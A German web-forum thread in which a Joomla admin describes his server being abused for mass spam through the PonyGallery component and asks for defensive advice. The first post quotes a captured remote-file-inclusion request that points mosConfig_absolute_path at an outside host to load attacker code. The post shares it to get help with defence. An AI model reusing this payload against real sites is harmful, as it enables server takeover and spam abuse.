Spam über PonyGallerie

**boxer** · 03.11.2008 19:36

Hallo Leute,

ich bin momentan am verzeweifeln. Ständig wird mein Server missbraucht, um Spams zu verschicken. Gestern war es der Hammer. 10.000 Mails innerhalb von wenigen Stunden.

Ich habe gesehen, dass anscheinend die PonyGallerie Ziel der leider erfolgreichen Attacken ist. Ich verwende Joomla 1.0.15 und PonyGallery ML 2.5.1 BUILD 20080226.

Exemplarisch hier ein Aufruf, der lieben Spammer:

Code:

http://www.xxx.de/index.php?option=com_ponygallery&Itemid=28&func=detail&id=100/index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://grelou666.cfun.fr/dz.txt?

Dabei kam der Aufruf von IP 82.24.79.56. Vorige Tage war es ein Server aus Nigeria :-)

Habt Ihr bitte eine Idee, wie ich mich gegen derartige Angriffe schützen kann? Als Reaktion auf die Angriffe Firewall-Regeln oder Apache-Deny´s für die IP´s einpflegen ist momentan dass, was ich als "Waffe" habe, das kann aber nicht alles sein!

Gruß

Peter

**deejey** · 03.11.2008 19:43

prüfe über systeminfo nach, ob register_globals off ist, wenn nicht, setze es auf off

**boxer** · 03.11.2008 20:12

Ist leider schon auf "off".

**shadow3010** · 08.11.2008 15:41

Zitat von deejey

prüfe über systeminfo nach, ob register_globals off ist, wenn nicht, setze es auf off

weißt du überhaupt, für was diese Funktion gut ist.

Weil dein Vorschlag wäre äquivalent zu. "Meine Bremse am Auto geht nimmer? Prüf mal die Batterie!"

@boxer

wenn es wirklich 10000 innerhalb weniger Stunden waren, ist es sehr unwahrscheinlich, dass die PHP Mail Funktion verwendet wurde. 10000 Mails in dieser kurzen Zeit, würden selbst einen sehr leistungsfähigen Root-Server lahmlegen bzw überfordern.

Wäre es nicht möglich, dass evtl. (d)ein SMTP Dienst deines Servers direkt befallen ist?

**deejey** · 08.11.2008 16:01

Zitat von shadow3010

weißt du überhaupt, für was diese Funktion gut ist.

nein, nur du weißt es

**shadow3010** · 08.11.2008 19:34

dann kannste dich ja mal reinlesen

http://de3.php.net/register_globals

**boxer** · 09.11.2008 13:05

Hallo Leute,

vielen Dank, dass Ihr Euch mit meinem Problem beschäftigt.

@shadow3010: Die Zahl stimmt schon. Wie die das genau gemacht haben, entzieht sich immer noch meiner Kenntnis. Wie ich ja in meinem Posting geschrieben habe, haben die eine PHP-Seite auf einem fremden Rechner benutzt. Nach meinen Recherchen ist das ein Massmailer.
Ich habe jeweils zum Zeitpunkt der "Angriffe" gesehen, dass mein "Apache"-User einen Sendmail-Prozess gestartet hatte. Dieser verschwand auch immer artig, wenn ich meinen httpd durchgestartet habe.

Code:

apache   28439  0.0  0.4  5952 2340 ?        S    Oct28   0:00 /usr/sbin/sendmail -t -i

Ich habe kurz nach meinemn ersten Posting 2 Aktivitäten durchgeführt:

1.) Ich habe in Joomla die Mailfunktionalität in der Global Configuration von "PHP Mailfunction" auf "SMTP-Server" umgestellt.
2.) Ich habe die "Artio JoomSEF" 2.1.1 deaktiviert, nachdem ich gesehen habe, dass diese wohl als unsicher gillt.

Seither habe ich keinen Angriff mehr verzeichnen können. So eine Ruhe vor dem Sturm hatte ich allerdings vor einer Woche schon mal und ich wage nicht zu sagen, ob ich mit meinen Aktionen Erfolg gehabt habe.

Also nochmals, vielen Dank, dass Ihr Euch mit meinem Problem beschäftigt. Ich bin für jeden Hinweis dankbar.

Gruß

Peter

Thema: Spam über PonyGallerie

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Spam über PonyGallerie

Lesezeichen

Lesezeichen

Berechtigungen